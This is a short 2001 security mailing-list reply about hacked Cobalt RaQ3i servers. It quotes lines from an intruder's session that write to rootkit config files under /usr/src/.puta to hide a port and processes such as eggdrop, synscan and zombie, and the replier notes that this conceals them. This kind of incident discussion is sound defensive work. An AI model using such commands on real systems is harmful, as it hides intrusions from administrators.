[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-security] Re: RaQ3i are still vulnerable AFTER BIND update..
- Subject: Re: [cobalt-security] Re: RaQ3i are still vulnerable AFTER BIND update..
- From: Michael Stauber <cobalt@xxxxxxxxxxxxxx>
- Date: Fri, 17 Aug 2001 15:26:23 +0200
- Organization: Stauber Multimedia Design
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Hi Paul,
> Here goes, I'll warn you though it doesn't make pretty reading!
echo 3 8888 >> /usr/src/.puta/.1addr
echo 2 eggdrop >> /usr/src/.puta/.1proc
echo 2 screen >> /usr/src/.puta/.1proc
echo 2 SCREEN >> /usr/src/.puta/.1proc
echo 2 synscan >> /usr/src/.puta/.1proc
echo 2 syn >> /usr/src/.puta/.1proc
echo 2 zombie >> /usr/src/.puta/.1proc
Oh yeah. The above is sending those processes into hiding. Seen that a lot in
the past.
--
With best regards,
Michael Stauber
SOLARSPEED.NET